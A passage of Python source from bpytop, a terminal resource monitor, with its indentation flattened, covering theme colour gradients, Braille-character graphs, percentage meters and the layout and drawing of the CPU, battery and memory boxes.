tdict["graph_text"] = tdict["inactive_fg"]
if not "meter_bg" in tdict and "inactive_fg" in tdict:
tdict["meter_bg"] = tdict["inactive_fg"]
if not "process_start" in tdict and "cpu_start" in tdict:
tdict["process_start"] = tdict["cpu_start"]
tdict["process_mid"] = tdict.get("cpu_mid", "")
tdict["process_end"] = tdict.get("cpu_end", "")
#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
for item, value in DEFAULT_THEME.items():
default = item in ["main_fg", "main_bg"]
depth = "bg" if item in ["main_bg", "selected_bg"] else "fg"
if item in tdict:
setattr(self, item, Color(tdict[item], depth=depth, default=default))
else:
setattr(self, item, Color(value, depth=depth, default=default))
#* Create color gradients from one, two or three colors, 101 values indexed 0-100
self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
rgb: Dict[str, Tuple[int, int, int]]
colors: List[List[int]] = []
for name in self.gradient:
rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
colors = [ list(getattr(self, f'{name}_start')) ]
if rgb["end"][0] >= 0:
r = 50 if rgb["mid"][0] >= 0 else 100
for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
for i in range(r):
colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
if r == 100:
break
self.gradient[name] += [ Color.fg(*color) for color in colors ]
else:
c = Color.fg(*rgb["start"])
self.gradient[name] += [c] * 101
#* Set terminal colors
Term.fg = f'{self.main_fg}'
Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(self.main_fg, self.main_bg)
@classmethod
def refresh(cls):
'''Sets themes dict with names and paths to all found themes'''
cls.themes = { "Default" : "Default" }
try:
for d in (THEME_DIR, USER_THEME_DIR):
if not d: continue
for f in os.listdir(d):
if f.endswith(".theme"):
cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
except Exception as e:
errlog.exception(str(e))
@staticmethod
def _load_file(path: str) -> Dict[str, str]:
'''Load a bashtop formatted theme file and return a dict'''
new_theme: Dict[str, str] = {}
try:
with open(path, "r") as f:
for line in f:
if not line.startswith("theme["): continue
key = line[6:line.find("]")]
s = line.find('"')
value = line[s + 1:line.find('"', s + 1)]
new_theme[key] = value
except Exception as e:
errlog.exception(str(e))
return new_theme
class Banner:
'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
out: List[str] = []
c_color: str = ""
length: int = 0
if not out:
for num, (color, color2, line) in enumerate(BANNER_SRC):
if len(line) > length: length = len(line)
out_var = ""
line_color = Color.fg(color)
line_color2 = Color.fg(color2)
line_dark = Color.fg(f'#{80 - num * 6}')
for n, letter in enumerate(line):
if letter == "█" and c_color != line_color:
if 5 < n < 25: c_color = line_color2
else: c_color = line_color
out_var += c_color
elif letter == " ":
letter = f'{Mv.r(1)}'
c_color = ""
elif letter != "█" and c_color != line_dark:
c_color = line_dark
out_var += line_dark
out_var += letter
out.append(out_var)
@classmethod
def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
out: str = ""
if center: col = Term.width // 2 - cls.length // 2
for n, o in enumerate(cls.out):
out += f'{Mv.to(line + n, col)}{o}'
out += f'{Term.fg}'
if now: Draw.out(out)
else: return out
class Symbol:
h_line: str = "─"
v_line: str = "│"
left_up: str = "┌"
right_up: str = "┐"
left_down: str = "└"
right_down: str = "┘"
title_left: str = "┤"
title_right: str = "├"
div_up: str = "┬"
div_down: str = "┴"
graph_up: Dict[float, str] = {
0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
}
graph_up_small = graph_up.copy()
graph_up_small[0.0] = "\033[1C"
graph_down: Dict[float, str] = {
0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
}
graph_down_small = graph_down.copy()
graph_down_small[0.0] = "\033[1C"
meter: str = "■"
up: str = "↑"
down: str = "↓"
left: str = "←"
right: str = "→"
enter: str = "↲"
ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
class Graph:
'''Class for creating and adding to graphs
* __str__ : returns graph as a string
* add(value: int) : adds a value to graph and returns it as a string
* __call__ : same as add
'''
out: str
width: int
height: int
graphs: Dict[bool, List[str]]
colors: List[str]
invert: bool
max_value: int
color_max_value: int
offset: int
current: bool
last: int
symbol: Dict[float, str]
def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None):
self.graphs: Dict[bool, List[str]] = {False : [], True : []}
self.current: bool = True
self.width = width
self.height = height
self.invert = invert
self.offset = offset
if not data: data = [0]
if max_value:
self.max_value = max_value
data = [ min(100, (v + offset) * 100 // (max_value + offset)) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
else:
self.max_value = 0
if color_max_value:
self.color_max_value = color_max_value
else:
self.color_max_value = self.max_value
if self.color_max_value and self.max_value:
color_scale = int(100.0 * self.max_value / self.color_max_value)
else:
color_scale = 100
self.colors: List[str] = []
if isinstance(color, list) and height > 1:
for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
if invert: self.colors.reverse()
elif isinstance(color, Color) and height > 1:
self.colors = [ f'{color}' for _ in range(height) ]
else:
if isinstance(color, list): self.colors = color
elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
if self.height == 1:
self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
else:
self.symbol = Symbol.graph_down if invert else Symbol.graph_up
value_width: int = ceil(len(data) / 2)
filler: str = ""
if value_width > width: #* If the size of given data set is bigger then width of graph, shrink data set
data = data[-(width*2):]
value_width = ceil(len(data) / 2)
elif value_width < width: #* If the size of given data set is smaller then width of graph, fill graph with whitespace
filler = self.symbol[0.0] * (width - value_width)
if len(data) % 2: data.insert(0, 0)
for _ in range(height):
for b in [True, False]:
self.graphs[b].append(filler)
self._create(data, new=True)
def _create(self, data: List[int], new: bool = False):
h_high: int
h_low: int
value: Dict[str, int] = { "left" : 0, "right" : 0 }
val: int
side: str
#* Create the graph
for h in range(self.height):
h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
for v in range(len(data)):
if new: self.current = bool(v % 2) #* Switch between True and False graphs
if new and v == 0: self.last = 0
for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
if val >= h_high:
value[side] = 4
elif val <= h_low:
value[side] = 0
else:
if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
if new: self.last = data[v]
self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
if data: self.last = data[-1]
self.out = ""
if self.height == 1:
self.out += f'{"" if not self.colors else self.colors[self.last]}{self.graphs[self.current][0]}'
elif self.height > 1:
for h in range(self.height):
if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
if self.colors: self.out += f'{Term.fg}'
def __call__(self, value: Union[int, None] = None) -> str:
if not isinstance(value, int): return self.out
self.current = not self.current
if self.height == 1:
if self.graphs[self.current][0].startswith(self.symbol[0.0]):
self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
else:
self.graphs[self.current][0] = self.graphs[self.current][0][1:]
else:
for n in range(self.height):
self.graphs[self.current][n] = self.graphs[self.current][n][1:]
if self.max_value: value = (value + self.offset) * 100 // (self.max_value + self.offset) if value < self.max_value else 100
self._create([value])
return self.out
def add(self, value: Union[int, None] = None) -> str:
return self.__call__(value)
def __str__(self):
return self.out
def __repr__(self):
return repr(self.out)
class Graphs:
'''Holds all graphs and lists of graphs for dynamically created graphs'''
cpu: Dict[str, Graph] = {}
cores: List[Graph] = [NotImplemented] * THREADS
temps: List[Graph] = [NotImplemented] * (THREADS + 1)
net: Dict[str, Graph] = {}
detailed_cpu: Graph = NotImplemented
detailed_mem: Graph = NotImplemented
pid_cpu: Dict[int, Graph] = {}
class Meter:
'''Creates a percentage meter
__init__(value, width, theme, gradient_name) to create new meter
__call__(value) to set value and return meter as a string
__str__ returns last set meter as a string
'''
out: str
color_gradient: List[str]
color_inactive: Color
gradient_name: str
width: int
invert: bool
saved: Dict[int, str]
def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
self.gradient_name = gradient_name
self.color_gradient = THEME.gradient[gradient_name]
self.color_inactive = THEME.meter_bg
self.width = width
self.saved = {}
self.invert = invert
self.out = self._create(value)
def __call__(self, value: Union[int, None]) -> str:
if not isinstance(value, int): return self.out
if value > 100: value = 100
elif value < 0: value = 100
if value in self.saved:
self.out = self.saved[value]
else:
self.out = self._create(value)
return self.out
def __str__(self) -> str:
return self.out
def __repr__(self):
return repr(self.out)
def _create(self, value: int) -> str:
if value > 100: value = 100
elif value < 0: value = 100
out: str = ""
for i in range(1, self.width + 1):
if value >= round(i * 100 / self.width):
out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
else:
out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
break
else:
out += f'{Term.fg}'
if not value in self.saved:
self.saved[value] = out
return out
class Meters:
cpu: Meter
battery: Meter
mem: Dict[str, Union[Meter, Graph]] = {}
swap: Dict[str, Union[Meter, Graph]] = {}
disks_used: Dict[str, Meter] = {}
disks_free: Dict[str, Meter] = {}
class Box:
'''Box class with all needed attributes for create_box() function'''
name: str
height_p: int
width_p: int
x: int
y: int
width: int
height: int
proc_mode: bool = (CONFIG.view_mode == "proc" and not ARG_MODE) or ARG_MODE == "proc"
stat_mode: bool = (CONFIG.view_mode == "stat" and not ARG_MODE) or ARG_MODE == "stat"
out: str
bg: str
_b_cpu_h: int
_b_mem_h: int
redraw_all: bool
buffers: List[str] = []
clock_on: bool = False
clock: str = ""
clock_len: int = 0
resized: bool = False
clock_custom_format: Dict[str, Any] = {
"/host" : os.uname()[1],
"/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0],
}
if clock_custom_format["/host"].endswith(".local"):
clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "")
@classmethod
def calc_sizes(cls):
'''Calculate sizes of boxes'''
for sub in cls.__subclasses__():
sub._calc_size() # type: ignore
sub.resized = True # type: ignore
@classmethod
def draw_update_ms(cls, now: bool = True):
update_string: str = f'{CONFIG.update_ms}ms'
xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
if not "+" in Key.mouse:
Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
if now and not Menu.active:
Draw.clear("update_ms")
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def draw_clock(cls, force: bool = False):
out: str = ""
if force: pass
elif not cls.clock_on or Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
clock_string = cls.clock = strftime(CONFIG.draw_clock)
for custom in cls.clock_custom_format:
if custom in clock_string:
clock_string = clock_string.replace(custom, cls.clock_custom_format[custom])
clock_len = len(clock_string[:(CpuBox.width-56)])
if cls.clock_len != clock_len and not CpuBox.resized:
out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}'
cls.clock_len = clock_len
now: bool = False if Menu.active else not force
out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}'
f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}')
Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active)
if now and not Menu.active:
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def draw_bg(cls, now: bool = True):
'''Draw all boxes outlines and titles'''
Draw.buffer("bg", "".join(sub._draw_bg() for sub in cls.__subclasses__()), now=now, z=1000, only_save=Menu.active, once=True) # type: ignore
cls.draw_update_ms(now=now)
if CONFIG.draw_clock: cls.draw_clock(force=True)
class SubBox:
box_x: int = 0
box_y: int = 0
box_width: int = 0
box_height: int = 0
box_columns: int = 0
column_size: int = 0
class CpuBox(Box, SubBox):
name = "cpu"
x = 1
y = 1
height_p = 32
width_p = 100
resized: bool = True
redraw: bool = False
buffer: str = "cpu"
battery_percent: int = 1000
battery_secs: int = 0
battery_status: str = "Unknown"
old_battery_pos = 0
old_battery_len = 0
battery_path: Union[str, None] = ""
battery_clear: bool = False
battery_symbols: Dict[str, str] = {"Charging": "▲",
"Discharging": "▼",
"Full": "■",
"Not charging": "■"}
clock_block: bool = True
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
cpu = CpuCollector
height_p: int
if cls.proc_mode: height_p = 20
else: height_p = cls.height_p
cls.width = round(Term.width * cls.width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height < 8: cls.height = 8
Box._b_cpu_h = cls.height
#THREADS = 64
cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
cls.column_size = 2
cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
cls.column_size = 1
cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
cls.column_size = 0
else:
cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
cls.box_height = ceil(THREADS / cls.box_columns) + 4
if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
cls.box_x = (cls.width - 1) - cls.box_width
cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
@classmethod
def _draw_bg(cls) -> str:
if not "M" in Key.mouse:
Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
@classmethod
def battery_activity(cls) -> bool:
if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
if cls.battery_percent != 1000:
cls.battery_clear = True
return False
if cls.battery_path == "":
cls.battery_path = None
if os.path.isdir("/sys/class/power_supply"):
for directory in sorted(os.listdir("/sys/class/power_supply")):
if directory.startswith('BAT') or 'battery' in directory.lower():
cls.battery_path = f'/sys/class/power_supply/{directory}/'
break
return_true: bool = False
percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
if percent != cls.battery_percent:
cls.battery_percent = percent
return_true = True
seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
if seconds != cls.battery_secs:
cls.battery_secs = seconds
return_true = True
status: str = "not_set"
if cls.battery_path:
status = readfile(cls.battery_path + "status", default="not_set")
if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
status = "Charging" if cls.battery_percent < 100 else "Full"
elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
status = "Discharging"
elif status == "not_set":
status = "Unknown"
if status != cls.battery_status:
cls.battery_status = status
return_true = True
return return_true or cls.resized or cls.redraw or Menu.active
@classmethod
def _draw_fg(cls):
cpu = CpuCollector
if cpu.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
lavg: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
hh: int = ceil(h / 2)
hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors
ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores
if cls.resized or cls.redraw:
if not "m" in Key.mouse:
Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{ARG_MODE or CONFIG.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
Graphs.cpu["up"] = Graph(w - bw - 3, hh, THEME.gradient["cpu"], cpu.cpu_usage[0])
Graphs.cpu["down"] = Graph(w - bw - 3, h - hh, THEME.gradient["cpu"], cpu.cpu_usage[0], invert=True)
Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
if cls.column_size > 0 or ct_width > 0:
for n in range(THREADS):
Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1])
if cpu.got_sensors:
Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
if cls.column_size > 1:
for n in range(1, THREADS + 1):
if not cpu.cpu_temp[n]:
continue
Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
Draw.buffer("cpu_misc", out_misc, only_save=True)
if CONFIG.show_battery and cls.battery_activity():
bat_out: str = ""
if cls.battery_secs > 0:
battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
else:
battery_time = ""
if not hasattr(Meters, "battery") or cls.resized:
Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○")
battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}')
battery_pos = cls.width - battery_len - 17
if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized:
bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len
bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active)
elif cls.battery_clear:
out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.battery_clear = False
cls.battery_percent = 1000
cls.battery_secs = 0
cls.battery_status = "Unknown"
cls.old_battery_pos = 0
cls.old_battery_len = 0
cls.battery_path = ""
Draw.clear("battery", saved=True)
cx = cy = cc = 0
ccw = (bw + 1) // cls.box_columns
if cpu.cpu_freq:
freq: str = f'{cpu.cpu_freq} Mhz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
out += (f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_usage[0][-1])}{Mv.to(y + hh, x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_usage[0][-1])}'
f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
if cpu.got_sensors:
out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
f'{cpu.cpu_temp[0][-1]:>4}{THEME.main_fg}°C')
cy += 1
for n in range(1, THREADS + 1):
out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
if cls.column_size > 0 or ct_width > 0:
out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
else:
out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores:
if cls.column_size > 1:
out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
else:
out += f'{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}'
out += f'{cpu.cpu_temp[n][-1]:>4}{THEME.main_fg}°C'
elif cpu.got_sensors and not hide_cores:
out += f'{Mv.r(max(6, 6 * cls.column_size))}'
out += f'{THEME.div_line(Symbol.v_line)}'
cy += 1
if cy > ceil(THREADS/cls.box_columns) and n != THREADS:
cc += 1; cy = 1; cx = ccw * cc
if cc == cls.box_columns: break
if cy < bh - 1: cy = bh - 1
if cy < bh and cc < cls.box_columns:
if cls.column_size == 2 and cpu.got_sensors:
lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
else:
lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
out += f'{Mv.to(y + h - 1, x + 1)}{THEME.graph_text}up {cpu.uptime}'
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
name = "mem"
height_p = 38
width_p = 45
x = 1
y = 1
mem_meter: int = 0
mem_size: int = 0
disk_meter: int = 0
divider: int = 0
mem_width: int = 0
disks_width: int = 0
graph_height: int
resized: bool = True
redraw: bool = False
buffer: str = "mem"
swap_on: bool = CONFIG.show_swap
Box.buffers.append(buffer)
mem_names: List[str] = ["used", "available", "cached", "free"]
swap_names: List[str] = ["used", "free"]
@classmethod
def _calc_size(cls):
width_p: int; height_p: int
if cls.stat_mode:
width_p, height_p = 100, cls.height_p
else:
width_p, height_p = cls.width_p, cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100) + 1
Box._b_mem_h = cls.height
cls.y = Box._b_cpu_h + 1
if CONFIG.show_disks:
cls.mem_width = ceil((cls.width - 3) / 2)
cls.disks_width = cls.width - cls.mem_width - 3
if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
cls.divider = cls.x + cls.mem_width
else:
cls.mem_width = cls.width - 1
item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
elif cls.mem_width > 25: cls.mem_size = 2
else: cls.mem_size = 1
cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
if cls.mem_size == 1: cls.mem_meter += 6
if cls.mem_meter < 1: cls.mem_meter = 0
if CONFIG.mem_graphs:
cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
if cls.graph_height == 0: cls.graph_height = 1
if cls.graph_height > 1: cls.mem_meter += 6
else:
cls.graph_height = 0
if CONFIG.show_disks:
cls.disk_meter = cls.width - cls.mem_width - 23
if cls.disks_width < 25:
cls.disk_meter += 10
if cls.disk_meter < 1: cls.disk_meter = 0
@classmethod
def _draw_bg(cls) -> str:
if cls.proc_mode: return ""
out: str = ""
out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
if CONFIG.show_disks:
out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.title("disks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
return out
@classmethod
def _draw_fg(cls):
if cls.proc_mode: return
mem = MemCollector
if mem.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
gbg: str = ""
gmv: str = ""
gli: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
if cls.resized or cls.redraw:
cls._calc_size()
out_misc += cls._draw_bg()
Meters.mem = {}
Meters.swap = {}
Meters.disks_used = {}
Meters.disks_free = {}
if cls.mem_meter > 0:
for name in cls.mem_names:
if CONFIG.mem_graphs:
Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
else:
Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
if cls.swap_on:
for name in cls.swap_names:
if CONFIG.mem_graphs and not CONFIG.swap_disk:
Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
elif CONFIG.swap_disk and CONFIG.show_disks:
Meters.disks_used["__swap"] = Meter(mem.swap_percent["used"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free["__swap"] = Meter(mem.swap_percent["free"], cls.disk_meter, "free")
break
else:
Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
if cls.disk_meter > 0:
for n, name in enumerate(mem.disks.keys()):
if n * 2 > h: break
Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
if not "g" in Key.mouse:
Key.mouse["g"] = [[x + cls.mem_width - 8 + i, y-1] for i in range(5)]
out_misc += (f'{Mv.to(y-1, x + cls.mem_width - 9)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
